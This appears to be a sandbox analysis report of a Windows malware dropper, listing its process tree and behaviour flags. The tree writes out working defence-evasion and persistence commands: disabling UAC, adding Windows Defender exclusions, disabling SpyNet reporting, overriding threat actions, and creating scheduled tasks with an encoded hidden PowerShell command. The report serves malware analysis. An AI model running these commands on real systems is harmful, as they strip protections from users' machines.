PID 2432 wrote to memory of 220	2432	15845dec2c7e05004d52ed8c1541d3b364fe6155f9263f7599b4e684fab2c3a5.exe	93
PID 2432 wrote to memory of 220	2432	15845dec2c7e05004d52ed8c1541d3b364fe6155f9263f7599b4e684fab2c3a5.exe	93
PID 2432 wrote to memory of 220	2432	15845dec2c7e05004d52ed8c1541d3b364fe6155f9263f7599b4e684fab2c3a5.exe	93
PID 2432 wrote to memory of 220	2432	15845dec2c7e05004d52ed8c1541d3b364fe6155f9263f7599b4e684fab2c3a5.exe	93
PID 2432 wrote to memory of 220	2432	15845dec2c7e05004d52ed8c1541d3b364fe6155f9263f7599b4e684fab2c3a5.exe	93
PID 2432 wrote to memory of 220	2432	15845dec2c7e05004d52ed8c1541d3b364fe6155f9263f7599b4e684fab2c3a5.exe	93
PID 220 wrote to memory of 3332	220	jsc.exe	97
PID 220 wrote to memory of 3332	220	jsc.exe	97
PID 220 wrote to memory of 1520	220	jsc.exe	98
PID 220 wrote to memory of 1520	220	jsc.exe	98
PID 220 wrote to memory of 1520	220	jsc.exe	98
PID 220 wrote to memory of 4932	220	jsc.exe	101
PID 220 wrote to memory of 4932	220	jsc.exe	101
PID 220 wrote to memory of 4932	220	jsc.exe	101
PID 4932 wrote to memory of 1828	4932	BPdtJV4NFkQ45Ae1AkIs7lVJ.exe	102
PID 4932 wrote to memory of 1828	4932	BPdtJV4NFkQ45Ae1AkIs7lVJ.exe	102
PID 4932 wrote to memory of 1828	4932	BPdtJV4NFkQ45Ae1AkIs7lVJ.exe	102
PID 220 wrote to memory of 3728	220	jsc.exe	105
PID 220 wrote to memory of 3728	220	jsc.exe	105
PID 220 wrote to memory of 3728	220	jsc.exe	105
PID 4932 wrote to memory of 860	4932	BPdtJV4NFkQ45Ae1AkIs7lVJ.exe	131
PID 4932 wrote to memory of 860	4932	BPdtJV4NFkQ45Ae1AkIs7lVJ.exe	131
PID 4932 wrote to memory of 860	4932	BPdtJV4NFkQ45Ae1AkIs7lVJ.exe	131
PID 4932 wrote to memory of 4860	4932	BPdtJV4NFkQ45Ae1AkIs7lVJ.exe	104
PID 4932 wrote to memory of 4860	4932	BPdtJV4NFkQ45Ae1AkIs7lVJ.exe	104
PID 4932 wrote to memory of 4860	4932	BPdtJV4NFkQ45Ae1AkIs7lVJ.exe	104
PID 4860 wrote to memory of 4888	4860	BPdtJV4NFkQ45Ae1AkIs7lVJ.exe	106
PID 4860 wrote to memory of 4888	4860	BPdtJV4NFkQ45Ae1AkIs7lVJ.exe	106
PID 4860 wrote to memory of 4888	4860	BPdtJV4NFkQ45Ae1AkIs7lVJ.exe	106
PID 220 wrote to memory of 1856	220	jsc.exe	108
PID 220 wrote to memory of 1856	220	jsc.exe	108
PID 220 wrote to memory of 1856	220	jsc.exe	108
PID 1856 wrote to memory of 2160	1856	GQuJChOeLukAkRMNh8eCcIgT.exe	109
PID 1856 wrote to memory of 2160	1856	GQuJChOeLukAkRMNh8eCcIgT.exe	109
PID 1856 wrote to memory of 2160	1856	GQuJChOeLukAkRMNh8eCcIgT.exe	109
PID 2160 wrote to memory of 5044	2160	BroomSetup.exe	110
PID 2160 wrote to memory of 5044	2160	BroomSetup.exe	110
PID 2160 wrote to memory of 5044	2160	BroomSetup.exe	110
PID 5044 wrote to memory of 4800	5044	cmd.exe	114
PID 5044 wrote to memory of 4800	5044	cmd.exe	114
PID 5044 wrote to memory of 4800	5044	cmd.exe	114
PID 1856 wrote to memory of 3144	1856	GQuJChOeLukAkRMNh8eCcIgT.exe	115
PID 1856 wrote to memory of 3144	1856	GQuJChOeLukAkRMNh8eCcIgT.exe	115
PID 1856 wrote to memory of 3144	1856	GQuJChOeLukAkRMNh8eCcIgT.exe	115
PID 5044 wrote to memory of 928	5044	cmd.exe	116
PID 5044 wrote to memory of 928	5044	cmd.exe	116
PID 5044 wrote to memory of 928	5044	cmd.exe	116
PID 220 wrote to memory of 4356	220	jsc.exe	117
PID 220 wrote to memory of 4356	220	jsc.exe	117
PID 220 wrote to memory of 4356	220	jsc.exe	117
PID 4356 wrote to memory of 4428	4356	dRDX5b2mCS4zyryljRWJpSDX.exe	118
PID 4356 wrote to memory of 4428	4356	dRDX5b2mCS4zyryljRWJpSDX.exe	118
PID 4356 wrote to memory of 4428	4356	dRDX5b2mCS4zyryljRWJpSDX.exe	118
PID 4428 wrote to memory of 3648	4428	Install.exe	119
PID 4428 wrote to memory of 3648	4428	Install.exe	119
PID 4428 wrote to memory of 3648	4428	Install.exe	119
PID 3648 wrote to memory of 3412	3648	Install.exe	120
PID 3648 wrote to memory of 3412	3648	Install.exe	120
PID 3648 wrote to memory of 3412	3648	Install.exe	120
PID 3648 wrote to memory of 3344	3648	Install.exe	122

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	15845dec2c7e05004d52ed8c1541d3b364fe6155f9263f7599b4e684fab2c3a5.exe

C:\Users\Admin\AppData\Local\Temp\15845dec2c7e05004d52ed8c1541d3b364fe6155f9263f7599b4e684fab2c3a5.exe
"C:\Users\Admin\AppData\Local\Temp\15845dec2c7e05004d52ed8c1541d3b364fe6155f9263f7599b4e684fab2c3a5.exe"
1⤵
- UAC bypass
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2432
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\15845dec2c7e05004d52ed8c1541d3b364fe6155f9263f7599b4e684fab2c3a5.exe" -Force
  2⤵
  PID:4860
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
  2⤵
  - Drops startup file
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:220
- - C:\Users\Admin\Pictures\A4eWwZPDBoPplc9UFZADoEf0.exe
    "C:\Users\Admin\Pictures\A4eWwZPDBoPplc9UFZADoEf0.exe"
    3⤵
    - Executes dropped EXE
    PID:3332
- - C:\Users\Admin\Pictures\beaEl9dZ428YIE6029Oh6QTl.exe
    "C:\Users\Admin\Pictures\beaEl9dZ428YIE6029Oh6QTl.exe"
    3⤵
    - Executes dropped EXE
    PID:1520
- - C:\Users\Admin\Pictures\BPdtJV4NFkQ45Ae1AkIs7lVJ.exe
    "C:\Users\Admin\Pictures\BPdtJV4NFkQ45Ae1AkIs7lVJ.exe" --silent --allusers=0
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Enumerates connected drives
    - Modifies system certificate store
    - Suspicious use of WriteProcessMemory
    PID:4932
  - - C:\Users\Admin\Pictures\BPdtJV4NFkQ45Ae1AkIs7lVJ.exe
      C:\Users\Admin\Pictures\BPdtJV4NFkQ45Ae1AkIs7lVJ.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.41 --initial-client-data=0x2f0,0x2f4,0x2f8,0x2c8,0x2fc,0x700f9530,0x700f953c,0x700f9548
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1828
  - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\BPdtJV4NFkQ45Ae1AkIs7lVJ.exe
      "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\BPdtJV4NFkQ45Ae1AkIs7lVJ.exe" --version
      4⤵
      PID:860
  - - C:\Users\Admin\Pictures\BPdtJV4NFkQ45Ae1AkIs7lVJ.exe
      "C:\Users\Admin\Pictures\BPdtJV4NFkQ45Ae1AkIs7lVJ.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4932 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240118011516" --session-guid=37e9be7a-5b68-4184-801e-addb7df6ab5a --server-tracking-blob=NDI2ZTk3MmU2ZDAxYzQ4Njk5NmYxNDgyMWJiNTdlYWY2ZDVmYmE5ZmU4MjA3NTMwODQzZmMxNmU0NGE1M2NkZTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwNTU0MDUxNS42NTY0IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiJlZTU1NDQyZC05NWJlLTQwYjItYjYyNS1iOTcyMWVmNWFlNWIifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=6005000000000000
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Enumerates connected drives
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4860
    - - C:\Users\Admin\Pictures\BPdtJV4NFkQ45Ae1AkIs7lVJ.exe
        
        C:\Users\Admin\Pictures\BPdtJV4NFkQ45Ae1AkIs7lVJ.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.41 --initial-client-data=0x2e8,0x2ec,0x2fc,0x2c0,0x300,0x6f029530,0x6f02953c,0x6f029548
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4888
  - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401180115161\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe
      "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401180115161\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"
      4⤵
      Executes dropped EXE
      PID:4824
  - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401180115161\assistant\assistant_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401180115161\assistant\assistant_installer.exe" --version
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4024
- - C:\Users\Admin\Pictures\yD9X3hAWS9ba2IwpGmmFzQSv.exe
    "C:\Users\Admin\Pictures\yD9X3hAWS9ba2IwpGmmFzQSv.exe"
    3⤵
    - Executes dropped EXE
    PID:3728
- - C:\Users\Admin\Pictures\GQuJChOeLukAkRMNh8eCcIgT.exe
    "C:\Users\Admin\Pictures\GQuJChOeLukAkRMNh8eCcIgT.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1856
  - - C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
      C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2160
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:5044
      - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        6⤵
        
        PID:4800
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
        6⤵
        Creates scheduled task(s)
        
        PID:928
  - - C:\Users\Admin\AppData\Local\Temp\nsv6266.tmp
      C:\Users\Admin\AppData\Local\Temp\nsv6266.tmp
      4⤵
      Executes dropped EXE
      PID:3144
- - C:\Users\Admin\Pictures\dRDX5b2mCS4zyryljRWJpSDX.exe
    "C:\Users\Admin\Pictures\dRDX5b2mCS4zyryljRWJpSDX.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4356
  - - C:\Users\Admin\AppData\Local\Temp\7zS9191.tmp\Install.exe
      .\Install.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4428
    - - C:\Users\Admin\AppData\Local\Temp\7zS96C2.tmp\Install.exe
        
        .\Install.exe /iydidJcyq "385118" /S
        5⤵
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Drops file in System32 directory
        Enumerates system info in registry
        Suspicious use of WriteProcessMemory
        
        PID:3648
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        6⤵
        
        PID:3412
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        7⤵
        
        PID:2520
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        8⤵
        
        PID:860
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        8⤵
        
        PID:2148
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        6⤵
        
        PID:3344
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        7⤵
        
        PID:4696
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        8⤵
        
        PID:4024
        
        C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401180115161\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401180115161\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.16 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0x1062614,0x1062620,0x106262c
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1188
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        8⤵
        
        PID:2352
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gkunyAEsW" /SC once /ST 00:33:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Creates scheduled task(s)
        
        PID:860
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gkunyAEsW"
        6⤵
        
        PID:4692
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gkunyAEsW"
        6⤵
        
        PID:5160
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bVEVndcbdbMTLxjAoU" /SC once /ST 01:17:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\DRMDPsTwbwzTeMqfl\peJGcJBHfMNQRLQ\UYllEaK.exe\" K5 /qOsite_idelQ 385118 /S" /V1 /F
        6⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:5208
- - C:\Users\Admin\Pictures\OEjwHLp1P9vcmQziZ9gl6bgX.exe
    "C:\Users\Admin\Pictures\OEjwHLp1P9vcmQziZ9gl6bgX.exe" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==
    3⤵
    - Executes dropped EXE
    PID:3128
- - C:\Users\Admin\Pictures\5ekdGv77gm4HHlUcItJrTddu.exe
    "C:\Users\Admin\Pictures\5ekdGv77gm4HHlUcItJrTddu.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Registers COM server for autorun
    - Drops file in Program Files directory
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    PID:2004

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3704
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:3900

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:2292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:3636

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:5052

C:\Users\Admin\AppData\Local\Temp\DRMDPsTwbwzTeMqfl\peJGcJBHfMNQRLQ\UYllEaK.exe
C:\Users\Admin\AppData\Local\Temp\DRMDPsTwbwzTeMqfl\peJGcJBHfMNQRLQ\UYllEaK.exe K5 /qOsite_idelQ 385118 /S
1⤵
- Executes dropped EXE
PID:5396
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:1392
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4496
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:4484
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1124
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5028
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4448
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:868
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4036
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5608
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:640
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:764
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5504
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:876
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4376
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2724
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4476
- - C:\Windows\SysWOW64\reg.exe
